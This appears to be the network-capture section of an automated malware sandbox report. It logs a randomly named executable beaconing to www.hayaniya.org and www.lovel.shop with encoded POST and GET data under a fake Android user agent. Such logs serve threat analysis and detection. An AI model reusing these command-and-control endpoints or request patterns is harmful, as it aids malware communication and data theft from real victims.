                                                                        Date: Thu, 28 Nov 2024 08:14:42 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                        Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                        Nov 28, 2024 09:14:42.540267944 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                        Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                        Nov 28, 2024 09:14:42.540281057 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                        Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                        Nov 28, 2024 09:14:42.541014910 CET672INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                        Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                        Nov 28, 2024 09:14:42.541028023 CET1236INData Raw: 36 76 8e 7d 29 12 ee 3e 5c 9a 75 73 17 15 97 f5 be 8a 0e 17 25 15 df bb ac 74 95 01 75 7b 25 21 e5 22 29 e9 c2 a1 0d cc 43 e9 9a 5f 48 cc fd 77 e3 ec 5a 93 2e df b4 d8 68 81 52 12 f7 26 d7 ab 69 5f a7 31 22 67 0b e6 f1 2c 4b 2f 45 41 e3 40 fb de
                                                                        Data Ascii: 6v})>\us%tu{%!")C_HwZ.hR&i_1"g,K/EA@IgeS,CGQ2i5a/XK/%2b&v[gB'70lu$>ej&EceeN4gU[O)CKpau\4.>yy]MxZs`Iv
                                                                        Nov 28, 2024 09:14:42.541826010 CET1236INData Raw: 98 bb c6 6e 88 4f 51 40 a8 1f a8 03 a3 d5 6c 77 a3 d3 bd b2 f5 c5 bb 76 ae 07 fc a6 ba 2d 91 5f 15 7a 81 fd 4a 0c f4 bb cd 2b 13 d0 be 51 02 ae dc ed dd 08 18 5b 4b 65 8f 19 e5 c7 86 24 6c 62 52 d8 cc 34 02 49 bc 89 19 28 15 c5 07 96 15 e0 19 e6
                                                                        Data Ascii: nOQ@lwv-_zJ+Q[Ke$lbR4I(tB4WDXHEEQr~-Bio13u,Ooe"F[\h<?P@H68l`EGSF~4Q7K{<. \u'f5f.TG
                                                                        Nov 28, 2024 09:14:42.541838884 CET1236INData Raw: aa 97 7e 59 b4 38 18 74 2a be b8 54 f3 67 67 85 17 33 ea f3 a3 50 d8 94 91 95 86 0e a0 20 72 a5 6b 9e 7b 59 52 be ec 91 c2 36 5b 88 fa da 3b eb 9f 8d e8 e6 f6 7a d8 ca f6 b7 37 2c 8e b0 f3 23 4d f9 b1 f8 d3 c3 7e 24 fe 40 eb 3e 39 b2 85 74 89 3c
                                                                        Data Ascii: ~Y8t*Tgg3P rk{YR6[;z7,#M~$@>9t<I|tR"gE__#E?R!:8v'_+.||V;4QU*S`zf.VMuf1U1K<0ecq<1#!J
                                                                        Nov 28, 2024 09:14:42.542694092 CET1236INData Raw: 55 ff de 38 9c 89 44 25 36 d9 ca 60 77 e0 d8 6e 9f dc 1e 83 ff aa 17 b8 84 bf 62 cd bf 37 f6 a6 01 56 31 8e a2 ad f4 35 1d bb dd 75 46 55 fa 62 e0 6f 8a 1b 21 b1 46 fd 7e b3 d7 6c 75 ba fd 5e 7b f4 4e 24 fe be d8 e3 12 16 cb 75 2f a5 71 6c b9 f4
                                                                        Data Ascii: U8D%6`wnb7V15uFUbo!F~lu^{N$u/qlKksQG$UJDYA^dE(l@.VQ`SYD&Xb>PlR$=Z:tr3}zQHDv=AI737p ;QJqEZtM
                                                                        Nov 28, 2024 09:14:42.542706966 CET1236INData Raw: b8 12 e6 76 05 42 01 47 63 d6 57 ef 56 64 82 35 0b e8 f6 b9 fa 1a a8 01 7a 8c f4 45 fa 57 d0 cc b3 f9 23 e3 c7 e6 af dd 1b 0c 2f 27 10 b0 74 72 5c a3 fc db 5f 22 c5 ad 4d 3a 9c 25 73 59 81 a6 34 a3 63 23 b5 08 f7 f2 ef b0 62 e3 ab f0 97 fe 31 7d
                                                                        Data Ascii: vBGcWVd5zEW#/'tr\_"M:%sY4c#b1}f; Y\?@UImjf?=`x129$cl%,xqXpc;VzB>u0w!5%tgG>T$w!Jb@^[
                                                                        Nov 28, 2024 09:14:42.542717934 CET1236INData Raw: c9 4e 7e b3 c7 eb f7 2f 3b d6 5d 77 78 d7 1e dd 75 47 77 87 7d 94 3d f0 20 7f 74 73 db c9 ed 5e 25 09 e7 fe 51 dd 91 33 8c 75 87 9e 3f 9e 3f 31 80 94 97 f3 27 cb 1b df 30 d0 76 b7 dd bb 1c 2a ec df 29 d1 95 b8 f0 28 87 6d b7 f2 47 7f 09 d2 ee ac
                                                                        Data Ascii: N~/;]wxuGw}= ts^%Q3u??1'0v*)(mGpk1q(uowMMI$/$4(y~@V$5'fk 2_AOvo0N@Qo6q<f"fM7
                                                                        Nov 28, 2024 09:14:42.660480976 CET1236INData Raw: a6 9c 48 a3 ea 63 49 c8 91 8f 23 44 4e e1 12 2e 71 cb 2e db 9a 64 05 ab 1d 50 af b9 a6 9c 8d ac ed c2 71 ba 03 af 39 e8 57 b8 5e f5 ac 72 ad 1b eb 15 eb 17 04 a5 f9 44 a1 a9 c4 51 cd b4 48 44 09 c3 6a 89 72 4b 97 ed fb da fd 6e 7f d8 eb 56 22 1c
                                                                        Data Ascii: HcI#DN.q.dPq9W^rDQHDjrKnV" 0T&vt_A[HmNRn8%Jk)U%AVHJ+E)_; bfYip8F86<yO-+Q[b9[i=b_gE>J&H+x7\


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        11192.168.2.549894192.185.147.100802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:43.855289936 CET1833OUTPOST /yf1h/ HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.hayaniya.org
                                                                        Referer: http://www.hayaniya.org/yf1h/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 56 58 42 6f 37 4d 76 38 36 77 2f 78 71 41 51 6f 45 4a 43 57 42 79 61 75 39 62 34 76 74 67 5a 53 73 63 79 48 48 39 77 53 76 58 4b 55 63 68 6f 33 4b 35 4d 49 4d 56 49 6d 46 44 56 6e 44 74 2b 64 4d 75 75 5a 6d 54 79 2f 77 63 75 6b 68 6c 53 37 62 38 54 5a 2f 39 71 4f 41 54 47 4a 4e 44 75 46 46 6f 54 70 43 70 43 38 7a 2f 50 6b 6b 48 61 38 64 38 59 77 37 6c 76 67 6e 72 46 37 43 59 36 34 4a 56 45 4b 30 78 6e 59 67 69 71 7a 6d 4d 55 4e 30 39 51 33 62 52 46 41 56 53 75 32 6c 5a 75 4e 6d 6f 4c 36 75 49 53 6c 58 42 65 39 65 42 41 78 36 67 75 68 45 52 64 4b 73 64 47 78 71 4e 79 77 76 61 72 73 65 4a 31 38 53 77 64 72 76 72 5a 76 43 36 67 45 70 6c 73 69 75 74 34 39 37 70 31 44 42 43 68 42 63 4b 44 65 4e 49 76 30 56 31 34 6f 64 79 54 63 67 69 6f 78 42 76 77 4a 34 2f 4f 4a 2b 4b 36 42 53 4b 75 75 6a 49 41 74 32 49 69 2f 55 41 6f 51 56 65 59 37 54 78 4a 68 64 38 2f 67 4d 4a 76 61 75 46 4d 7a 7a 51 6b 4e 50 4b 70 64 6d 66 58 6f 69 38 5a 34 70 53 73 50 6b 35 4f 30 44 59 6a 48 70 4e 32 65 6f 51 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=VXBo7Mv86w/xqAQoEJCWByau9b4vtgZSscyHH9wSvXKUcho3K5MIMVImFDVnDt+dMuuZmTy/wcukhlS7b8TZ/9qOATGJNDuFFoTpCpC8z/PkkHa8d8Yw7lvgnrF7CY64JVEK0xnYgiqzmMUN09Q3bRFAVSu2lZuNmoL6uISlXBe9eBAx6guhERdKsdGxqNywvarseJ18SwdrvrZvC6gEplsiut497p1DBChBcKDeNIv0V14odyTcgioxBvwJ4/OJ+K6BSKuujIAt2Ii/UAoQVeY7TxJhd8/gMJvauFMzzQkNPKpdmfXoi8Z4pSsPk5O0DYjHpN2eoQGsBuE+0lba0HSXIupUouCIbDqqxPMPQVoO27261vvxwGr/9ELU2ztWrf3UvwnT2r8ypnA63vdNd2qz7JjBXoHw4G02mLK7F3xta1/GvwevUIRB7QqWa2rjaxb12vs1PQD158WNp6QwHF74HTf8p527l+7cscIthyh8Fs3HIK+tMDt8J5eBLUHbLf14DudSYDSuKO7XCUfyUTB8qnUSWIL7zoGXkIxXif24zQ/rqSZnpi0uqPnEE4pXt9ut+4PPRdO9oybzcShtk1bW3QkGJMUpu8x9w83/J5JXWv/asSu0flX5ap4xPaQ1gUJjgtE8n1SHhoe5J4MK1b2cVGH+lNBOqADKreuTruZt4m/Wpe+HuPgLadQkRBKYePtlYs8NaFDqA9fa1lmzjr8UY38RjV3IqRqmtELkwgrxGsn67uiLiCRpjoNX+vBWJ3R++vLqtjgP9gR3FkzH5/l/bShZQ+k/yvPedmChE/DPw2DN0p3HWAZp07AETEWTGpwsmSQ1hohcHzmaLpeFgmbTiqhpWlrB8DB1Vs5+sbsYDxN852Mj7TW67kNES7gfyo53CySzIAdc4TWJ7uVUB44QV1EgnQeJX1AtC0iTAQE5yCtPTeSXCI7ALDsxw3aMyrv5vj8T73N/W/l2csPyuQ5udqIYJjNt2fYb1O3YeT+g [TRUNCATED]
                                                                        Nov 28, 2024 09:14:45.186304092 CET1236INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 28 Nov 2024 08:14:44 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        Transfer-Encoding: chunked
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                        Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                        Nov 28, 2024 09:14:45.186531067 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                        Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                        Nov 28, 2024 09:14:45.186543941 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                        Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                        Nov 28, 2024 09:14:45.187294960 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                        Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                        Nov 28, 2024 09:14:45.187308073 CET896INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                                        Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                                        Nov 28, 2024 09:14:45.188066959 CET1236INData Raw: 06 75 27 66 d6 35 89 95 08 91 13 c7 66 2e 99 c6 54 08 47 84 21 91 0e 31 12 d6 88 a4 70 13 47 c5 06 a3 a5 6d e0 4c 9f 8e 60 42 1e 18 ef b7 70 0b 77 1c d0 a1 07 fb 21 0f 87 94 cd 8c 03 cc 42 2c 31 dd 39 db d9 d9 69 4c 1d 37 42 50 ec 4b 12 c7 28 1f
                                                                        Data Ascii: u'f5f.TG!1pGmL`Bpw!B,19iL7BPK(vC$ S~bSh5w;m@{9H^_G"N2zHy@y=pits2lV]76xBjr(&*PkAHb#zJHpQ'vHU3
                                                                        Nov 28, 2024 09:14:45.188108921 CET1236INData Raw: dc 81 7f 63 97 9e 18 0e c3 71 3c 31 09 23 21 e1 4a c8 a2 14 39 82 2b 4c 39 91 45 f2 4a 76 e0 11 b4 e8 5a 26 94 ff c6 58 ef b0 6c 29 22 c2 11 cb b4 65 8b d3 89 69 1a 45 9f fb cb 14 87 51 e7 38 bb c9 7d 23 90 c4 83 11 4a 45 07 96 15 e0 19 e6 74 86
                                                                        Data Ascii: cq<1#!J9+L9EJvZ&Xl)"eiEQ8}#JEtBA[wA1ty:,qv]bi+nlYQr~Z#40Ss3hZ,KKqi@VXx(+UJDYANx#]uA&)#;1LsET
                                                                        Nov 28, 2024 09:14:45.188981056 CET1236INData Raw: 37 33 d6 37 d9 70 20 3b 51 4a f0 0a 71 45 cb 5a e2 74 4d 11 d2 8f 22 a2 db 34 5c e2 e1 84 29 f3 22 51 14 83 1d c1 15 a6 9c c8 12 7c 7d b6 6e 9c 33 18 95 b9 63 bc 2d cf d8 28 64 94 1f 57 bc 31 fd 92 a0 38 34 8d 40 12 6f 62 06 4a 45 f1 81 65 05 78
                                                                        Data Ascii: 737p ;QJqEZtM"4\)"Q|}n3c-(dW184@obJEex9u(wG_'Y[fZqiJj`Iq!d'*=,nO1=}9qE##v$=_51fa0n(e`Q"uQk
                                                                        Nov 28, 2024 09:14:45.188992977 CET1236INData Raw: 24 77 21 e4 4a 11 b9 62 ca cd 1b 17 40 a7 db e9 5e 5b 00 dd d2 03 df 7e fe 75 b5 de 37 65 d0 c9 8f de 59 16 64 76 29 06 3c ba 82 0c 1e a5 e7 e9 9f d3 97 e9 73 2d 84 3f a6 af c1 f1 1a a4 f0 7c 29 84 1b 26 65 d0 7e 1b 4a e0 3b dc 24 06 ad 06 4a 62
                                                                        Data Ascii: $w!Jb@^[~u7eYdv)<s-?|)&e~J;$JbVhl=&c"[=`%Tu`/_WFqz4q.{rXr+'NEJU\R0vmhH'y>%PCK!y~]M~$>
                                                                        Nov 28, 2024 09:14:45.189646959 CET1236INData Raw: af cf 66 fa c7 f4 4d fa 03 d0 f5 1f 9a bb ef 80 ca 37 f3 67 e9 73 fd 7c 33 7f 3c 7f 0a 7f cf 6e 93 cc 6e e7 0a da ac 52 b0 d0 9b b7 84 6d d7 50 aa 15 da cf bf ad 4a 6a 53 db d7 e2 09 d8 00 6a be 07 26 5e 69 6a 5e cc 9f cc bf 82 e7 7f ce 9f 2d a9
                                                                        Data Ascii: fM7gs|3<nnRmPJjSj&^ij^-[}$V"h9e$O]}"@:K874?8aeln'!WSn8:NG,2]["x2yS4hAnV%M+)4
                                                                        Nov 28, 2024 09:14:45.307002068 CET1236INData Raw: 4a a2 26 be 48 2b 78 d2 a4 15 0c 96 84 37 5c e2 e1 84 a9 42 5b 17 ea 13 b0 2b 4c 39 91 a5 10 eb b3 f3 d3 eb 9d 4c 43 0a 06 d3 ec 44 29 c1 4d 43 61 9b 72 97 9c 4e cc a6 69 60 49 31 62 d8 26 6c 62 fe 06 6a 8c 8f 8b 9a 3c 40 4e 23 0c a9 20 04 0f b3
                                                                        Data Ascii: J&H+x7\B[+L9LCD)MCarNi`I1b&lbj<@N# cu]'bF$I`EImu!n6dcsr[qGHB8%f-dnY\RfhyfP?Fv5UTXX(DEXs(aDX}]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        12192.168.2.549900192.185.147.100802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:46.649779081 CET542OUTGET /yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.hayaniya.org
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:14:47.789602995 CET503INHTTP/1.1 301 Moved Permanently
                                                                        Date: Thu, 28 Nov 2024 08:14:47 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade, close
                                                                        Location: http://hayaniya.org/yf1h/?QhKxhNP=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQwWjM0ybC5bIBemWzNbXvkTcX815xQrmtulGFojAfQ==&Yby=d2ydCtHpb8
                                                                        Content-Length: 0
                                                                        Content-Type: text/html; charset=UTF-8


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        13192.168.2.54991713.248.169.48802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:53.351852894 CET790OUTPOST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 6f 6b 78 4d 6a 65 77 4e 6b 43 64 32 57 65 6b 37 75 32 57 38 62 33 74 59 43 55 36 71 51 51 79 53 52 75 49 69 31 6f 6c 45 4e 55 4e 74 37 38 6b 2f 37 30 67 6c 46 6c 72 54 50 33 31 43 76 4f 35 4a 53 64 4a 78 66 68 6c 6f 4d 75 78 4b 35 6c 4e 73 71 5a 74 61 54 50 72 6a 54 56 2f 75 41 56 67 63 64 75 6f 43 32 54 69 4a 31 78 2f 43 4f 41 65 44 50 50 59 71 64 6d 57 6a 4e 65 4a 75 56 66 79 48 4b 77 78 65 33 50 32 4d 75 31 42 7a 68 73 55 36 2f 51 51 6e 44 61 58 39 30 46 31 59 6b 36 73 76 34 48 4e 4c 4d 61 75 74 35 62 74 54 6a 4d 48 31 57 58 2b 7a 4f 49 39 67 4d 43 34 3d
                                                                        Data Ascii: QhKxhNP=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDaX90F1Yk6sv4HNLMaut5btTjMH1WX+zOI9gMC4=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        14192.168.2.54992413.248.169.48802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:14:56.013505936 CET810OUTPOST /rxts/ HTTP/1.1
                                                                        Host: www.lovel.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.lovel.shop
                                                                        Referer: http://www.lovel.shop/rxts/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
